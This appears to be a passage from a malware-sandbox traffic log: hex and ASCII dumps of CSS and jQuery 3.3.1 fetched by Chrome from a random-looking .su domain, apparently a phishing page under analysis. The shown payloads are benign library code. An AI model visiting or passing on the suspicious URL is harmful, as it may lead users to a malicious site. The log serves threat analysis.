                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff65182d139a-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:30 UTC638INData Raw: 37 63 64 34 0d 0a 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                          Data Ascii: 7cd4html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-blo
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f
                                                          Data Ascii: ertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;fo
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 3a 62 65 66 6f 72 65 2c 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d
                                                          Data Ascii: ox-sizing:border-box}:before,:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline:5px auto -webkit-
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6e 3a 6e 6f 6e 65 7d 61 3a 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 36 36 7d 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74 65 78 74
                                                          Data Ascii: n:none}a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d
                                                          Data Ascii: ite-space:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.text-
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 69 6e 65 73 2d 34 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d 6d 61 78
                                                          Data Ascii: ines-4,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-max
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 30 32 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32
                                                          Data Ascii: space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.772
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 68 74 3a 34 30 2e 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 35 36 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c
                                                          Data Ascii: ht:40.9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow:el
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74
                                                          Data Ascii: ay:inline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-right
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 6d 64 2d 32 33 2c 2e 63 6f 6c 2d
                                                          Data Ascii: l-xs-18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.col-


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.649759172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:30 UTC685OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6UzTmEVCN/7V7eH0UOOchUDO2 HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:30 UTC744INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:30 GMT
                                                          Content-Type: text/javascript;charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=15CnFkIPh%2BNUnpXibSNQWDd%2B4WY1Gq3OuLbzf%2FX1wP%2Bt%2FIQxxiwdQ6SQRjZMaZXrFxsbCHf3eVx20F2lDv8wtXBme79gRF9d4jDP%2FqIiajG%2B%2BVokNjmLovE9gtIzrCZOpGWdO4BYgwqi0kwpbenPyY22Tgst"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff650fe553ce-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:30 UTC625INData Raw: 37 63 63 37 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22
                                                          Data Ascii: 7cc7/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 74 3d 3d 3d 74 2e 77 69 6e 64 6f 77 7d 2c 76 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 6f 3d 28 74 3d 74 7c 7c 72 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 6e 29 66 6f 72 28 69 20 69 6e 20 76 29 6e 5b 69 5d 26 26 28 6f 5b 69 5d 3d 6e 5b 69 5d 29 3b 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62
                                                          Data Ascii: n e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"ob
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 29 29 66 6f 72 28 74 20 69 6e 20 65 29 6e 3d 61 5b 74 5d 2c 61 21 3d 3d 28 72 3d 65 5b 74 5d 29 26 26 28 6c 26 26 72 26 26 28 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 72 29 7c 7c 28 69 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 29 29 3f 28 69 3f 28 69 3d 21 31 2c 6f 3d 6e 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 3a 5b 5d 29 3a 6f 3d 6e 26 26 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 6e 29 3f 6e 3a 7b 7d 2c 61 5b 74 5d 3d 77 2e 65 78 74 65 6e 64 28 6c 2c 6f 2c 72 29 29 3a 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 61 5b 74 5d 3d 72 29 29 3b 72 65 74 75 72 6e 20 61 7d 2c 77 2e 65 78 74 65 6e 64 28 7b 65 78 70 61 6e 64 6f 3a 22 6a 51 75 65 72 79 22 2b 28 22 33 2e 33 2e 31 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e
                                                          Data Ascii: ))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 75 70 70 6f 72 74 3a 68 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 77 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 77 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 76 61 72 20 74 3d 21 21 65 26 26 22 6c 65 6e 67 74 68 22
                                                          Data Ascii: upport:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 78 70 28 22 5e 5c 5c 2e 28 22 2b 52 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 52 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 49 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 57 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4d 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4d 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4d 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4d 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c
                                                          Data Ascii: xp("^\\.("+R+")"),TAG:new RegExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 72 65 74 75 72 6e 20 72 3b 69 66 28 21 69 26 26 28 28 74 3f 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 3a 77 29 21 3d 3d 64 26 26 70 28 74 29 2c 74 3d 74 7c 7c 64 2c 67 29 29 7b 69 66 28 31 31 21 3d 3d 54 26 26 28 66 3d 4a 2e 65 78 65 63 28 65 29 29 29 69 66 28 6f 3d 66 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 54 29 7b 69 66 28 21 28 6c 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 29 72 65 74 75 72 6e 20 72 3b 69 66 28 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 20 69 66 28 6d 26 26 28 6c 3d 6d 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 26 26 78 28 74 2c 6c 29 26 26 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 7b 69
                                                          Data Ascii: return r;if(!i&&((t?t.ownerDocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{i
                                                          2024-01-24 14:34:30 UTC1369INData Raw: 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 6e 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 6e 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 74 3f 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21
                                                          Data Ascii: (e){return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!
